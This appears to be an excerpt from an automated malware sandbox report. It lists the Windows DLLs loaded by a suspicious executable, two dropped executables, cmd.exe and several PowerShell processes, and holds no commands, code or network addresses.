Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\where.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
